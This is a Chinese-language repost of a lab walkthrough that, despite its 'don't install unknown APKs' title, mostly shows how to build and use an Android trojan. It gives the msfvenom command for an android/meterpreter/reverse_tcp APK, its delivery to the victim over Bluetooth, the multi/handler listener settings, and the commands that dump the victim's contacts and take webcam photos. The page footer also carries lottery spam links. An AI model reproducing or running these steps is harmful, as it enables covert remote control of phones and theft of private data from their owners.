安基网 首页 安全 渗透测试 查看内容

来路不明的安装包请勿安装

2020-9-1 08:43| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 前言本次渗透为靶机测试。切勿用于非法用途!攻击者:192.168.1.3 termux+metasploit受害者:192.168.1.2 Android 5.1 - Linux 3.10.72+ (aarch64)使用模块:multi/handler首先生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk将其移动到/storage/emulate ...

前言

本次渗透为靶机测试。切勿用于非法用途!

攻击者:192.168.1.3 termux+metasploit

受害者:192.168.1.2 Android 5.1 - Linux 3.10.72+ (aarch64)

使用模块:multi/handler


首先生成安卓木马

msfvenom -p android/meterpreter/reverse_tcp LHOST=192。168。1。3 LPORT=3800 -o s。apk


将其移动到/storage/emulated/0/360目录。并使用蓝牙发送给受害者者。

受害者安装即可。回到攻击者,启动msfconsole。首先选择模块

use exploit multi/handler


设置监听地址

set lhost 192.168.1.3


设置反弹端口

set lprot 3800


设置playload

set payload android/meterpreter/reverse_tcp


启动

run


成功。试试执行命令。系统信息。

sysinfo


试试下载通讯录

dump_contacts


成功保存为txt文件。后面因为长时间未操作自动断开了。

试试拍照

webcam_snap


成功保存在files目录下。还有很多危险功能我就不一一说明了。一些来路不明的apk切勿安装。




小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6867147723813224975/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
大乐购彩票计划群 上海11选5 云南11选5走势图 山东11选5开奖 乐彩网导航 上海11选5 大金彩票计划群 湖北快3走势 杏彩票计划群 v8彩票计划群